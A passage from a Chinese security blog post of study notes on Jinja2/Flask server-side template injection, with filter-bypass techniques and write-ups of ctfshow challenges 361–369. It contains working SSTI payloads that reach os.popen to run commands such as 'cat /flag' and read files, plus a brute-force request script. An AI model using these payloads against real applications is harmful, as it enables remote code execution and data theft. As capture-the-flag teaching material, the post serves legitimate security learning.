<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment"># 直接字符表示</span><br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;__class__&quot;</span>)<br><br><span class="hljs-comment"># 转义字符表示</span><br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;\x5f\x5fclass\x5f\x5f&quot;</span>)<br><span class="hljs-comment">#十六进制转义</span><br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f&quot;</span>)<br><span class="hljs-comment">#十六进制加ascii转义</span><br><span class="hljs-comment"># 对于python2也可以Base64 编码和解码</span><br>encoded_str = <span class="hljs-string">&quot;X19jbGFzc19f&quot;</span><br>decoded_str = encoded_str.decode(<span class="hljs-string">&quot;base64&quot;</span>)<br><span class="hljs-built_in">print</span>(decoded_str)  <span class="hljs-comment"># 输出: &#x27;__class__&#x27;</span><br></code></pre></td></tr></table></figure>
<h4 id="5利用chr函数"><a class="markdownIt-Anchor" href="#5利用chr函数"></a> 5.利用chr函数</h4>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs python">&#123;% <span class="hljs-built_in">set</span> <span class="hljs-built_in">chr</span>=url_for.__globals__[<span class="hljs-string">&#x27;__builtins__&#x27;</span>].<span class="hljs-built_in">chr</span> %&#125;<br><span class="hljs-comment">#这里使用了 Jinja2 模板中的 set 语句，将 chr 函数赋值给一个模板变量 chr。</span><br><span class="hljs-comment">#chr函数将数字转化为字符</span><br>&#123;&#123;<span class="hljs-string">&quot;&quot;</span>[<span class="hljs-built_in">chr</span>(<span class="hljs-number">95</span>)%2bchr(<span class="hljs-number">95</span>)%2bchr(<span class="hljs-number">99</span>)%2bchr(<span class="hljs-number">108</span>)%2bchr(<span class="hljs-number">97</span>)%2bchr(<span class="hljs-number">115</span>)%2bchr(<span class="hljs-number">115</span>)%2bchr(<span class="hljs-number">95</span>)%2bchr(<span class="hljs-number">95</span>)]&#125;&#125;<br><span class="hljs-comment">#最终显示的也是__class__</span><br></code></pre></td></tr></table></figure>
<h4 id="6利用~拼接"><a class="markdownIt-Anchor" href="#6利用~拼接"></a> 6.利用~拼接</h4>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python">&#123;%<span class="hljs-built_in">set</span> a=<span class="hljs-string">&#x27;__cla&#x27;</span> %&#125;&#123;%<span class="hljs-built_in">set</span> b=<span class="hljs-string">&#x27;ss__&#x27;</span>%&#125;&#123;&#123;<span class="hljs-string">&quot;&quot;</span>[a~b]&#125;&#125;<br></code></pre></td></tr></table></figure>
<h4 id="7大小写绕过"><a class="markdownIt-Anchor" href="#7大小写绕过"></a> 7.大小写绕过</h4>
<p>前提是只过滤大写或者小写，比如</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-string">&quot;&quot;</span>[<span class="hljs-string">&quot;__CLASS__&quot;</span>.lower()]<br></code></pre></td></tr></table></figure>
<h3 id="4过滤器"><a class="markdownIt-Anchor" href="#4过滤器"></a> 4.过滤器</h3>
<p>这部分内容上面都有一个表，主要跟着详细介绍一下</p>
<h4 id="1attr"><a class="markdownIt-Anchor" href="#1attr"></a> 1.attr</h4>
<p>用于动态访问对象的属性，即访问管道符前面的内容</p>
<p>常用于.和[]被过滤的情况，比如</p>
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs markdown">&quot;&quot;|attr(&quot;<span class="hljs-strong">__class__</span>&quot;)<br>相当于<br>&quot;&quot;.<span class="hljs-strong">__class__</span><br></code></pre></td></tr></table></figure>
<p>返回的就是str</p>
<h4 id="2format"><a class="markdownIt-Anchor" href="#2format"></a> 2.format</h4>
<p>功能可以参考ascii的绕过，直接放案例了</p>
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs markdown">&quot;%c%c%c%c%c%c%c%c%c&quot;|format(95,95,99,108,97,115,115,95,95)==&#x27;<span class="hljs-strong">__class__</span>&#x27;<br>&quot;&quot;[&quot;%c%c%c%c%c%c%c%c%c&quot;|format(95,95,99,108,97,115,115,95,95)]<br></code></pre></td></tr></table></figure>
<h4 id="3first-last-random"><a class="markdownIt-Anchor" href="#3first-last-random"></a> 3.first ,last, random</h4>
<p>返回第一个最后一个或者随机，随机可以写脚本爆破，举个例子，如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-string">&quot;&quot;</span>.__class__.__mro__|last()<br>相当于<br><span class="hljs-string">&quot;&quot;</span>.__class__.__mro__[-<span class="hljs-number">1</span>]<br></code></pre></td></tr></table></figure>
<h4 id="4join"><a class="markdownIt-Anchor" href="#4join"></a> 4.join</h4>
<p>我个人认为就是用于拼接的，直接上例子，如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-string">&quot;&quot;</span>[[<span class="hljs-string">&#x27;__clas&#x27;</span>,<span class="hljs-string">&#x27;s__&#x27;</span>]|join] 或者 <span class="hljs-string">&quot;&quot;</span>[(<span class="hljs-string">&#x27;__clas&#x27;</span>,<span class="hljs-string">&#x27;s__&#x27;</span>)|join]<br>相当于<br><span class="hljs-string">&quot;&quot;</span>[<span class="hljs-string">&quot;__class__&quot;</span>]<br></code></pre></td></tr></table></figure>
<h4 id="5select和string"><a class="markdownIt-Anchor" href="#5select和string"></a> 5.select和string</h4>
<p>顾名思义选择和转化为字符，先选择字符串的内容，再转化为字母，可以构造拼接__class__</p>
<h2 id="四-靶场练习"><a class="markdownIt-Anchor" href="#四-靶场练习"></a> 四、靶场练习</h2>
<h4 id="知识点利用链"><a class="markdownIt-Anchor" href="#知识点利用链"></a> 知识点:利用链</h4>
<p>注意因python2,3以及版本的原因，是有部分差异的</p>
<p><strong>1.os._wrap_close</strong> 类popen,比如下面</p>
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs markdown">&quot;&quot;.<span class="hljs-strong">__class__</span>.<span class="hljs-strong">__bases__</span>[<span class="hljs-string">0</span>].<span class="hljs-strong">__subclasses__</span>()[<span class="hljs-string">134</span>].<span class="hljs-strong">__init__</span>.<span class="hljs-strong">__globals__</span>[<span class="hljs-string">&#x27;popen&#x27;</span>](<span class="hljs-link">&#x27;whoami&#x27;</span>).read()<br></code></pre></td></tr></table></figure>
<p><strong>2.os直接使用</strong></p>
<p><strong>3.__import__下的os</strong></p>
<p>种类还有很多，可以自己多加尝试总结。</p>
<p><strong>4.flask内置</strong></p>
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs markdown">Flask内置函数和内置对象可以通过&#123;&#123;self.<span class="hljs-strong">__dict__</span>.<span class="hljs-emphasis">_TemplateReference<span class="hljs-strong">__context.keys()&#125;&#125;查看，然后可以查看一下这几个东西的类型，类可以通过__</span>init<span class="hljs-strong">__方法跳到os，函数直接用__</span>globals<span class="hljs-strong">__方法跳到os。（payload一下子就简洁了）</span></span><br><span class="hljs-strong"><span class="hljs-emphasis"></span></span><br><span class="hljs-strong"><span class="hljs-emphasis">&#123;&#123;self.__</span>dict<span class="hljs-strong">__._TemplateReference__</span>context.keys()&#125;&#125;</span><br><span class="hljs-emphasis">#查看内置函数</span><br><span class="hljs-emphasis"></span><br><span class="hljs-emphasis">#函数：lipsum、url_</span>for、get<span class="hljs-emphasis">_flashed_</span>messages<br><span class="hljs-section">#类：cycler、joiner、namespace、config、request、session</span><br>&#123;&#123;lipsum.<span class="hljs-strong">__globals__</span>.os.popen(&#x27;ls&#x27;).read()&#125;&#125;<br><span class="hljs-section">#函数</span><br>&#123;&#123;cycler.<span class="hljs-strong">__init__</span>.<span class="hljs-strong">__globals__</span>.os.popen(&#x27;ls&#x27;).read()&#125;&#125;<br><span class="hljs-section">#类</span><br></code></pre></td></tr></table></figure>
<p><strong>5.通过getshell</strong></p>
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs markdown">原理就是找到含有 <span class="hljs-strong">__builtins__</span> 的类，然后利用<br><br>&#123;% for c in [].<span class="hljs-strong">__class__</span>.<span class="hljs-strong">__base__</span>.<span class="hljs-strong">__subclasses__</span>() %&#125;&#123;% if c.<span class="hljs-strong">__name__</span>==&#x27;catch<span class="hljs-emphasis">_warnings&#x27; %&#125;&#123;&#123; c.<span class="hljs-strong">__init__</span>.<span class="hljs-strong">__globals__</span>[&#x27;<span class="hljs-strong">__builtins__</span>&#x27;].eval(&quot;<span class="hljs-strong">__import__</span>(&#x27;os&#x27;).popen(&#x27;whoami&#x27;).read()&quot;) &#125;&#125;&#123;% endif %&#125;&#123;% endfor %&#125;</span><br><span class="hljs-emphasis">#读写文件</span><br><span class="hljs-emphasis">&#123;% for c in [].<span class="hljs-strong">__class__</span>.<span class="hljs-strong">__base__</span>.<span class="hljs-strong">__subclasses__</span>() %&#125;&#123;% if c.<span class="hljs-strong">__name__</span>==&#x27;catch_</span>warnings&#x27; %&#125;&#123;&#123; c.<span class="hljs-strong">__init__</span>.<span class="hljs-strong">__globals__</span>[&#x27;<span class="hljs-strong">__builtins__</span>&#x27;].open(&#x27;filename&#x27;, &#x27;r&#x27;).read() &#125;&#125;&#123;% endif %&#125;&#123;% endfor %&#125;<br></code></pre></td></tr></table></figure>
<h3 id="1ctfshow-361"><a class="markdownIt-Anchor" href="#1ctfshow-361"></a> 1.ctfshow 361</h3>
<p>尝试一下**?name=49**,发现是模板注入，输出是49</p>
<p>接着常规思路</p>
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs markdown">?name=&#123;&#123;&#x27;&#x27;.<span class="hljs-strong">__class__</span>.<span class="hljs-strong">__mro__</span>&#125;&#125;<br></code></pre></td></tr></table></figure>
<p><img src="/../../images/%E6%96%87%E7%AB%A0/ssti/361-1.png" srcset="/img/loading.gif" lazyload alt="361-1"></p>
<p>继续找子类,搜索os</p>
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs markdown">?name=&#123;&#123;&#x27;&#x27;.<span class="hljs-strong">__class__</span>.<span class="hljs-strong">__mro__</span>[1].<span class="hljs-strong">__subclasses__</span>()&#125;&#125;<br></code></pre></td></tr></table></figure>
<p><img src="/../../images/%E6%96%87%E7%AB%A0/ssti/361-2.png" srcset="/img/loading.gif" lazyload alt="361-2"></p>
<p>利用这里面的popen得到flag</p>
<p>因为每个环境使用的python库不同 所以类的排序有差异，本地并不一定是132，比如我用的3.9本地测的是134,自己找脚本跑一下就得到132了</p>
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs markdown">?name=&#123;&#123;&#x27;&#x27;.<span class="hljs-strong">__class__</span>.<span class="hljs-strong">__mro__</span>[<span class="hljs-string">1</span>].<span class="hljs-strong">__subclasses__</span>()[<span class="hljs-string">132</span>].<span class="hljs-strong">__init__</span>.<span class="hljs-strong">__globals__</span>[<span class="hljs-string">&#x27;popen&#x27;</span>](<span class="hljs-link">&#x27;tac /????&#x27;</span>).read()&#125;&#125;<br></code></pre></td></tr></table></figure>
<p><img src="/../../images/%E6%96%87%E7%AB%A0/ssti/361-3.png" srcset="/img/loading.gif" lazyload alt="361-3"></p>
<p>也可以用控制块来</p>
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs markdown">?name=&#123;% print(url<span class="hljs-emphasis">_for.<span class="hljs-strong">__globals__</span>[<span class="hljs-string">&#x27;__builtins__&#x27;</span>][<span class="hljs-symbol">&#x27;eval&#x27;</span>](&quot;<span class="hljs-strong">__import__</span>(&#x27;os&#x27;).popen(&#x27;cat /flag&#x27;).read()&quot;))%&#125;</span><br></code></pre></td></tr></table></figure>
<h3 id="2ctfshow-362"><a class="markdownIt-Anchor" href="#2ctfshow-362"></a> 2.ctfshow 362</h3>
<p>正常的思路先测一下是否是模板注入</p>
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs markdown">?name=&#123;&#123;1-1&#125;&#125;<br></code></pre></td></tr></table></figure>
<p>发现是正确的，然后测看看子类，也是可以进行的</p>
<p>但是最后发现应该把<strong>数字过滤</strong>了，那就试试另外一种吧</p>
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs markdown">?name=&#123;% print(url<span class="hljs-emphasis">_for.<span class="hljs-strong">__globals__</span>[<span class="hljs-string">&#x27;__builtins__&#x27;</span>][<span class="hljs-symbol">&#x27;eval&#x27;</span>](&quot;<span class="hljs-strong">__import__</span>(&#x27;os&#x27;).popen(&#x27;cat /flag&#x27;).read()&quot;))%&#125;</span><br></code></pre></td></tr></table></figure>
<p>这种还是可以直接写出来的</p>
<p>另外一种解法就是通过全角数字的解法得到答案</p>
<h3 id="3ctfshow-363"><a class="markdownIt-Anchor" href="#3ctfshow-363"></a> 3.ctfshow 363</h3>
<p>这题在此基础上<strong>过滤了引号</strong>，由此并不能直接用上面的方法，我尝试调用os.__class__.close并且用全角符号进行绕过,并且运用request.args.来间接调用发现好像并不能执行，因此，借鉴一下得到了一种解法</p>
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs markdown">?name=&#123;&#123;url<span class="hljs-emphasis">_for.<span class="hljs-strong">__globals__</span>[<span class="hljs-string">request.args.a</span>][<span class="hljs-symbol">request.args.b</span>](request.args.c).read()&#125;&#125;&amp;a=os&amp;b=popen&amp;c=cat /flag</span><br></code></pre></td></tr></table></figure>
<p>request.args用于获取 URL 中的查询参数如果有就返回如果没有将引发异常，这里后面的输入就可以得到答案了。</p>
<p>config.__str__[2]就是o可以拼接os,但是字母不够，仅仅是一种思路</p>
<p>此外还有一种利用chr的方式,也是可以的</p>
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs markdown">?name=&#123;% set chr=url<span class="hljs-emphasis">_for.<span class="hljs-strong">__globals__</span>.<span class="hljs-strong">__builtins__</span>.chr %&#125;&#123;% print url_</span>for.<span class="hljs-strong">__globals__</span>[chr(111)%2bchr(115)]%&#125;<br></code></pre></td></tr></table></figure>
<h3 id="4ctfshow-364"><a class="markdownIt-Anchor" href="#4ctfshow-364"></a> 4.ctfshow 364</h3>
<p>这题<strong>过滤了args</strong>,这题可以用request.values来传参，相比之下values支持get和post，优先级的话是先get,使用方法基本一样</p>
<p>上payload</p>
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs markdown">?name=&#123;&#123;url<span class="hljs-emphasis">_for.<span class="hljs-strong">__globals__</span>[<span class="hljs-string">request.values.a</span>][<span class="hljs-symbol">request.values.b</span>](request.values.c).read()&#125;&#125;&amp;a=os&amp;b=popen&amp;c=cat /flag</span><br></code></pre></td></tr></table></figure>
<p>当然这题发现好像也可以传cookies来进行</p>
<p><img src="/../../images/%E6%96%87%E7%AB%A0/ssti/364.png" srcset="/img/loading.gif" lazyload alt="364"></p>
<p>当然了也可以用lipsum来，lipsum里面有内置的os模块</p>
<p>payload是</p>
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs markdown">?name=&#123;&#123;lipsum.<span class="hljs-strong">__globals__</span>.os.popen(request.values.aaa).read()&#125;&#125;&amp;aaa=cat /flag<br></code></pre></td></tr></table></figure>
<h3 id="5ctfshow-365"><a class="markdownIt-Anchor" href="#5ctfshow-365"></a> 5.ctfshow 365</h3>
<p>这题用上面的lipsum的payload可以直接出答案</p>
<p>看了一下网上的wp这题是<strong>过滤[]</strong>，在上面的内容讲到过__getitem__，在遇到了‘和[]被禁用的时候可以使用这个函数</p>
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs markdown">?name=&#123;&#123;config.<span class="hljs-strong">__str__</span>().<span class="hljs-strong">__getitem__</span>(22)&#125;&#125;<br></code></pre></td></tr></table></figure>
<p>在这一题里面22是c，可以尝试构造cat /flag，用~来拼接起来</p>
<h3 id="6ctfshow-366"><a class="markdownIt-Anchor" href="#6ctfshow-366"></a> 6.ctfshow 366</h3>
<p>这题在前面题目的基础上<strong>过滤了下划线</strong></p>
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs markdown">?name=&#123;&#123;lipsum|attr(request.values.a)|attr(request.values.b)(request.values.c)|attr(request.values.d)(request.values.ocean)|attr(request.values.f)()&#125;&#125;&amp;ocean=cat /flag&amp;a=<span class="hljs-strong">__globals__</span>&amp;b=<span class="hljs-strong">__getitem__</span>&amp;c=os&amp;d=popen&amp;f=read<br></code></pre></td></tr></table></figure>
<p>这里我自己有一个疑惑点，觉得getitem不是必要的，但是输入后又不正确，通过gpt询问后，给的大致原因是</p>
<p>第二个URL之所以能够执行，是因为它使用了 <code>__getitem__</code> 这种更灵活的方式来访问全局变量，从而成功获取到 <code>os</code> 模块，并最终执行了命令。而第一个URL中直接使用 <code>attr</code> 的方式可能会因为解析问题而失败。我的理解是并不能直接有效的访问到os这个模块</p>
<p>由于只是检测name里面的传参，其实也可以精简一点用cookie来传参</p>
<p><img src="/../../images/%E6%96%87%E7%AB%A0/ssti/366.png" srcset="/img/loading.gif" lazyload alt="366"></p>
<p>PS(我认为这里换values，进行post传参也是一种方法，但是方法不成立orz)</p>
<h3 id="7ctfshow-367"><a class="markdownIt-Anchor" href="#7ctfshow-367"></a> 7.ctfshow 367</h3>
<p>这题<strong>过滤os</strong></p>
<p>直接用上面的payload直接可以过，看wp有一种是用get的方法</p>
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs markdown">?name=&#123;&#123;(lipsum|attr(request.values.a)).get(request.values.b).popen(request.values.c).read()&#125;&#125;&amp;a=<span class="hljs-strong">__globals__</span>&amp;b=os&amp;c=cat /flag<br></code></pre></td></tr></table></figure>
<p>366的payload使用多个 <code>attr</code> 需要模板引擎逐步解析并执行每个步骤，在某些情况下可能出现解析和执行顺序问题，导致无法正确执行 <code>read</code>。</p>
<p>这一题的payload链式调用方式更简单，直接执行一系列方法调用，容易通过模板引擎解析并执行</p>
<p>至于我想的问题？上面的为什么后面不能直接调用read()</p>
<p>每一步 <code>attr</code> 调用之间是独立的，模板引擎会分别解析和执行每个 <code>attr</code>，这样导致在调用 <code>os.popen(&quot;cat /flag&quot;)</code> 后，结果没有直接传递给 <code>attr(request.values.f)()</code>。因此，模板引擎可能在 <code>attr</code> 调用之间无法正确链接上下文，导致 <code>read</code> 无法直接执行。</p>
<p>这是两者payload的区别，也是记录一下方便回顾。</p>
<h3 id="8ctfshow-368"><a class="markdownIt-Anchor" href="#8ctfshow-368"></a> 8.ctfshow 368</h3>
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs markdown">测试了一下，这题禁用前双花括号,可以利用&#123;%...%&#125;，利用&#123;%print %&#125;打印出来<br></code></pre></td></tr></table></figure>
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs markdown">?name=&#123;%print(lipsum|attr(request.values.a)).get(request.values.b).popen(request.values.c).read()%&#125;&amp;a=<span class="hljs-strong">__globals__</span>&amp;b=os&amp;c=cat /flag<br></code></pre></td></tr></table></figure>
<h3 id="9ctfshow-369"><a class="markdownIt-Anchor" href="#9ctfshow-369"></a> 9.ctfshow 369</h3>
<p>这题<strong>禁用了request</strong>，就比较麻烦了</p>
<p>由于下划线被禁用了，不能使用getitem,看了师傅的wp,可以参照365部分的知识点，利用config里面string就行拼接</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> requests<br><br>url = <span class="hljs-string">&quot;f44b83e7-b564-400c-a10a-7dfd8acc96d3.challenge.ctf.show/?name=&#123;&#123;% print (config|string|list).pop(&#123;&#125;).lower() %&#125;&#125;&quot;</span><br>payload = <span class="hljs-string">&quot;cat /flag&quot;</span><br>result = <span class="hljs-string">&quot;&quot;</span><br><br><span class="hljs-comment"># 遍历 payload 中的每个字符</span><br><span class="hljs-keyword">for</span> j <span class="hljs-keyword">in</span> payload:<br>    <span class="hljs-comment"># 尝试从 0 到 999 的整数值</span><br>    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">0</span>, <span class="hljs-number">1000</span>):<br>        <span class="hljs-comment"># 向目标 URL 发送请求，替换占位符</span><br>        r = requests.get(url=url.<span class="hljs-built_in">format</span>(i))<br>        <span class="hljs-comment"># 查找响应中的 &lt;h3&gt; 标签位置</span><br>        location = r.text.find(<span class="hljs-string">&quot;&lt;h3&gt;&quot;</span>)<br>        <span class="hljs-comment"># 获取 &lt;h3&gt; 标签后的字符</span><br>        word = r.text[location+<span class="hljs-number">4</span>:location+<span class="hljs-number">5</span>]<br>        <span class="hljs-comment"># 如果字符匹配，记录并跳出循环</span><br>        <span class="hljs-keyword">if</span> word == j.lower():<br>            <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;(config|string|list).pop(%d).lower() == %s&quot;</span> % (i, j))<br>            result += <span class="hljs-string">&quot;(config|string|list).pop(%d).lower()~&quot;</span> % (i)<br>            <span class="hljs-keyword">break</span><br><br><span class="hljs-comment"># 打印最终结果，去掉末尾的 ~</span><br><span class="hljs-built_in">print</span>(result[:-<span class="hljs-number">1</span>])<br></code></pre></td></tr></table></figure>
<p>简要的payload就是</p>
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs markdown">?name=&#123;%print (lipsum|attr(a)).get(b).popen(c).read()%&#125;<br></code></pre></td></tr></table></figure>
<p>其中的abc，分别是<code>__globals__</code>,os,cat /flag,带入构成payload</p>
<p><img src="/../../images/%E6%96%87%E7%AB%A0/ssti/369.png" srcset="/img/loading.gif" lazyload alt="369"></p>
<p>还有一种替换字符的没怎么看懂就不写了</p>
<p>后面的三题没怎么看懂wp，orz,大题就是利用dict构造得到数字，然后利用得到最后拼接的意思，这次就先写到这里了。</p>
<h2 id="五-刷题有感"><a class="markdownIt-Anchor" href="#五-刷题有感"></a> 五、刷题有感</h2>
<p>这里放一下刷题遇到的姿势</p>
<h3 id="unicode绕过"><a class="markdownIt-Anchor" href="#unicode绕过"></a> unicode绕过</h3>
<p>适用于禁用了一些常规的还把.给禁用的，配合attr|有奇效</p>
<p>例题:<a target="_blank" rel="noopener" href="https://www.nssctf.cn/problem/910">安洵杯 2020Normal SSTI</a></p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/web/" class="category-chain-item">web</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/ssti/" class="print-no-link">#ssti</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>ssti模板注入学习</div>
      <div>https://0ran9ewww.github.io/2024/07/03/学习文章/ssti模板注入/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>orange</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2024年7月3日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2024/07/16/%E5%AD%A6%E4%B9%A0%E6%96%87%E7%AB%A0/sql%E6%B3%A8%E5%85%A5/" title="sql注入总结">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">sql注入总结</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2024/06/10/%E5%AD%A6%E4%B9%A0%E6%96%87%E7%AB%A0/xxe%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/" title="xxe漏洞学习">
                        <span class="hidden-mobile">xxe漏洞学习</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      

    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  






    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> <div> <span id="timeDate">载入天数...</span> <span id="times">载入时分秒...</span> <script src="/js/duration.js"></script> </div> <p>本 blog 由 dkdun 支持</p> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="busuanzi_container_site_pv" style="display: none">
        总访问量 
        <span id="busuanzi_value_site_pv"></span>
         次
      </span>
    
    
      <span id="busuanzi_container_site_uv" style="display: none">
        总访客数 
        <span id="busuanzi_value_site_uv"></span>
         人
      </span>
    
    
  
</div>

  
  
  
</div>
 
  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
